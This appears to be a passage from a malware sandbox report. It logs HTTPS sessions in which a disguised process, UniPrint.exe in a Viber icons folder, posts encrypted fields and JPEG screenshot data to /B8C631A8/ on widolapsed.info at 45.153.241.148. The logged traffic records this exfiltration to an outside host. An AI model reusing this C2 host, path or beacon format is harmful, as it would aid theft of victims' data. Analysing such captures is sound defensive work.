                                                                                                      2021-09-15 11:45:35 UTC797OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 53 c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${OweS0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:35 UTC797OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:35 UTC813OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:35 UTC829OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:35 UTC845OUTData Raw: 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de ec 97 71 3d 49 a5 cd 34 52 d2 b1 6a 4d 8e a7 0a 6e 69 73 48 b4 c7 66 9c 0d 47 4f 14 9a 29 31 f4 a2 9a 29 6a 4d 13 1d 4e 14 c0 69 d9 14 8a 4c 76 69 c2 99 9a 5c 9a 96 8b 4c 92 8a 68 26 97 ea 69 34 52 63 c5 2e 45 47 bd 07 56 1f 9d 31 ae 60 4e ae 0d 2e 56 1c e9 75 2c 83 f2 9f a5 71 9e 28 ff 00 8f d8 bf eb 90 ae 98 ea 50 2e 40 c9 ae 67 c4 a7 37 70 9f fa 64 3f 9d 54 62 d6 e0 a6 a5 2d 0e 2e 8a 2b 72 f0 a4 3e 17 d3 8c 72 e9 f1 bc d0 b9 78 de d4 34 d2 9f 35
                                                                                                      Data Ascii: BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*q=I4RjMnisHfGO)1)jMNiLvi\Lh&i4Rc.EGV1`N.Vu,q(P.@g7pd?Tb-.+r>rx45
                                                                                                      2021-09-15 11:45:35 UTC861OUTData Raw: 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 4c 96 ee fa 00 8f 3d a5
                                                                                                      Data Ascii: LES5?tyZS9s2OjiMAU?3SKOo7G7M:.QTO}-?)f>nG4LES5?tyZS9s2OjiMAU?3SKOo7L=
                                                                                                      2021-09-15 11:45:35 UTC876OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 36 33 33 32 35 37 39 31 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2963325791--
                                                                                                      2021-09-15 11:45:36 UTC876INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:35 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=0177b2f0d50c47965112384af772a4e79e63ae85d66bbd6fd460747d9ae09620; expires=Thu, 15-Sep-2022 11:45:36 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:36 UTC877INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.34976445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:37 UTC877OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 85135
                                                                                                      Content-Type: multipart/form-data; boundary=--------2571491142
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:37 UTC877OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 37 31 34 39 31 31 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2571491142Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:37 UTC877OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 4d b3 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${OweM0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:45:37 UTC877OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:37 UTC893OUTData Raw: ff 00 df 25 47 e1 52 4d 15 d2 eb b7 fa a4 db ff 00 b2 64 82 50 93 74 8a 48 8a 11 1c 6a 7a 13 9d a3 68 e4 11 ec 6b 96 f2 d7 d2 8d 8b e9 4b d9 3b 6f fd 31 fb 55 d8 bd 16 91 a8 3e c0 2d f2 5c c4 07 ce bc 99 46 53 bf 7f d3 be 2a 9b 29 56 2a c3 05 4e 08 a6 79 6b 4e 03 03 02 b5 49 f5 33 76 e8 14 52 d2 55 12 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 28 a2 81 05 14 51 40 05 14 52 d0 02 51 4b 49 40 0a 29 68 a2 98 82 b6 3c 37 0f 9e da a4 5f 66 b8 ba dd 62 7f 73 6e 70 ed fb c8 fa 7c ad fc 8d 63 d2 32 86 eb 53 25 74 d1 51 76 69 9b a3 4c 8e 3d 26 e2 69 b4 d9 e0 ba 88 b8 8e 19 99 b7 bc 79 5c c8 c3 8c 98 f3 d8 00 73 9c 7c ad 9b 43 4a b7 fe de 82 ce 5d 31 a2 b0 25 bc 8b 90 5c 9b dc 21 29 86 2c 14 ee 38 e1 76 f5 c6 45 72 de 5a 9e a2 97 cb 5c 63 15 1c 92 ee 5f 3c 6d b1 d1 ea
                                                                                                      Data Ascii: %GRMdPtHjzhkK;o1U>-\FS*)V*NykNI3vRUQEQE((Q@RQKI@)h<7_fbsnp|c2S%tQviL=&iy\s|CJ]1%\!),8vErZ\c_<m
                                                                                                      2021-09-15 11:45:37 UTC909OUTData Raw: d4 a4 bb 85 84 f6 56 8f 72 ca 15 ae b0 c2 46 f7 23 76 d2 71 c6 76 e7 f1 e6 9e 35 9b d5 bd 9e ec 47 6f e6 4f 75 1d db 0d a7 01 d0 92 00 e7 a7 cc 73 5c f6 9a b7 f5 d8 da f0 68 92 3d 11 a4 6c 7d be c9 43 4d e4 44 cc cf 89 a4 00 65 57 e5 ed 90 32 70 39 eb 4b 6f e1 f9 e6 8a 17 fb 4d 9c 72 4e 92 3c 70 c9 21 0e 42 12 1f b6 06 36 93 c9 e7 b6 7a 55 7b 4d 52 7b 58 c2 1b 6b 59 f6 4c 6e 21 32 ab 13 0c 87 19 2b 82 33 d0 70 d9 1c 0e 29 b1 6a 77 71 bd b3 ed 89 9a da 29 62 52 c0 9d c2 4d db 89 e7 af ce 7f 4a 2f 52 df d7 6f f3 0b 53 2e 41 e1 fb ab ab 98 e2 b4 96 1b 88 e4 80 dc 2c d1 2c 8c bb 03 6d 3f 28 5d f9 dd c6 36 fe 9c d5 0b eb 49 6c 2f 65 b4 b8 18 92 23 83 c1 19 e3 20 e0 80 7a 1e e0 1a 92 db 54 b9 82 18 ad da 0b 79 ad e3 81 ad da 29 03 62 44 67 2f ce 08 39 0d c8 20
                                                                                                      Data Ascii: VrF#vqv5GoOus\h=l}CMDeW2p9KoMrN<p!B6zU{MR{XkYLn!2+3p)jwq)bRMJ/RoS.A,,m?(]6Il/e# zTy)bDg/9
                                                                                                      2021-09-15 11:45:37 UTC925OUTData Raw: c6 3f f1 f5 6f fe e1 fe 75 74 b7 26 7b a3 87 cd 14 52 56 27 58 b4 51 45 00 26 d1 e9 4e 14 51 40 05 2d 25 2d 31 07 7a 28 a2 80 0c d2 d2 52 d0 02 d1 49 4b 4c 42 51 4a 69 28 00 a2 8a 28 00 a2 8a 28 01 69 28 a5 a0 02 8a 28 a0 05 a0 52 51 9a 62 1d 45 25 2d 30 0a 28 a5 a0 41 4b 45 18 a6 21 69 69 28 a6 20 34 a2 92 94 50 02 8a 4a 51 48 69 88 29 69 28 14 80 70 a7 0a 6d 2d 52 13 16 8a 4a 5a 60 2d 14 51 41 22 d1 45 14 c0 28 a2 8a 04 38 52 d3 45 28 a6 80 5a 5a 4a 5a 64 85 2d 25 28 a6 02 d1 45 14 c4 2d 14 94 b4 08 29 69 29 69 a0 1d 45 20 a5 a6 48 52 8a 28 a6 02 d1 40 a5 a6 21 29 29 68 a0 04 1d 69 f4 c1 d6 9f 42 06 14 1a 28 a6 48 0a 5a 41 4e c5 08 18 a0 53 a9 b4 e1 54 89 62 77 a5 a4 3d 69 c2 98 08 29 d4 da 51 4c 4c 5a 28 a2 81 00 a5 a4 14 ea 62 12 9d 49 45 30 63 a9 69
                                                                                                      Data Ascii: ?out&{RV'XQE&NQ@-%-1z(RIKLBQJi(((i((RQbE%-0(AKE!ii( 4PJQHi)i(pm-RJZ`-QA"E(8RE(ZZJZd-%(E-)i)iE HR(@!))hiB(HZANSTbw=i)QLLZ(bIE0ci
                                                                                                      2021-09-15 11:45:37 UTC941OUTData Raw: ad 3d 36 69 27 85 da 56 27 0d 81 90 33 d3 db df 35 ce 0b 80 c9 77 74 88 b1 ab ed 85 15 79 51 dd bf 45 fd 6b a5 d3 51 92 c6 2d e3 e6 61 b9 be a7 9a 9a d1 51 5b 0e 8c 9c a5 b9 6a 8a 28 ae 63 a8 e7 7c d9 ed ae b5 bb 98 18 8f 22 ee 29 24 50 01 df 18 8a 3d c3 eb 8c 91 8e e0 55 6b ad 56 e0 4d 64 f7 1a bf f6 7d a5 ea cf 28 76 48 c6 d4 05 3c b0 0b 02 01 20 e7 9c fd e2 3d 31 d1 df 5a fd b6 d8 c0 d3 4b 12 37 0f e5 e0 17 5e ea 49 07 00 fb 60 fa 11 48 d6 50 b5 ed bd d0 dc af 6f 1b c6 8a 31 b7 0d b7 3c 7f c0 45 1f d7 e0 33 95 9f 5a d5 bc fd 3d 25 bc b5 b1 0f 6b 1c b9 b9 91 60 13 b9 63 b8 61 91 b3 c0 5f 94 15 23 77 5f 4d 4d 54 6c f1 5e 93 2c 97 cf 02 34 33 22 a7 c8 15 db 29 f2 e4 8c e5 bd 01 cf cb c6 39 ce fd 14 3d 44 71 5a 5d de a7 a7 e8 d6 3e 44 c6 eb cd d2 a5 9a 2b
                                                                                                      Data Ascii: =6i'V'35wtyQEkQ-aQ[j(c|")$P=UkVMd}(vH< =1ZK7^I`HPo1<E3Z=%k`ca_#w_MMTl^,43")9=DqZ]>D+
                                                                                                      2021-09-15 11:45:37 UTC957OUTData Raw: 93 b2 d0 8a 95 15 35 ce d5 ec 6e 59 e8 d6 e1 36 5b 59 89 36 8e 49 4d c7 f1 aa fa 87 87 05 c2 b0 8e d5 a1 98 74 2a 84 7e 62 b7 46 ff 00 ec db 71 16 4c 63 3b f1 fd fc f7 fc 31 5b 7a 6f 9b f6 14 f3 f3 bb 27 6e ee bb 7b 7f 5a c3 13 4a 54 30 eb 10 a5 af 63 d1 86 3a 9d 69 fb 28 c3 dd 3c 5a 68 9e 09 9e 29 54 ab a1 2a c0 f6 34 ca da f1 8f 97 ff 00 09 45 ef 95 8c 6e 5c e3 d7 68 cf eb 58 b5 b5 39 73 c1 4b ba 38 a4 ac da 0a 9e da d9 ee 64 d8 8c 8b ee e7 02 a0 ab fa 35 b7 da f5 18 60 da 8d bd c0 c3 67 a7 7c 63 da b4 4a ee c4 b7 65 73 7a 3f 04 4a 61 46 9b 52 82 39 19 43 14 11 b3 60 7d 45 33 fe 10 de 71 fd a9 08 ff 00 b6 4d 5d d5 a5 d4 08 64 96 59 23 ce 76 88 cb ed ca 8f 71 d3 9a af a8 de c3 70 16 3b 68 96 32 4e 1b 12 16 cf e6 2b 78 c2 2c e7 94 e4 ba 9e 6b ae e9 2d a3
                                                                                                      Data Ascii: 5nY6[Y6IMt*~bFqLc;1[zo'n{ZJT0c:i(<Zh)T*4En\hX9sK8d5`g|cJesz?JaFR9C`}E3qM]dY#vqp;h2N+x,k-
                                                                                                      2021-09-15 11:45:37 UTC960OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 37 31 34 39 31 31 34 32 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2571491142--
                                                                                                      2021-09-15 11:45:37 UTC960INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:37 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=ef4cd9e59b43a1592fdd724fc97f6d09dc93332053352ed0f8b5cf10b037f7de; expires=Thu, 15-Sep-2022 11:45:37 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:37 UTC960INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.34976545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:38 UTC960OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 82926
                                                                                                      Content-Type: multipart/form-data; boundary=--------3335732562
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:38 UTC961OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 33 33 35 37 33 32 35 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3335732562Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:38 UTC961OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 0a ba 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:38 UTC961OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:38 UTC977OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:38 UTC993OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
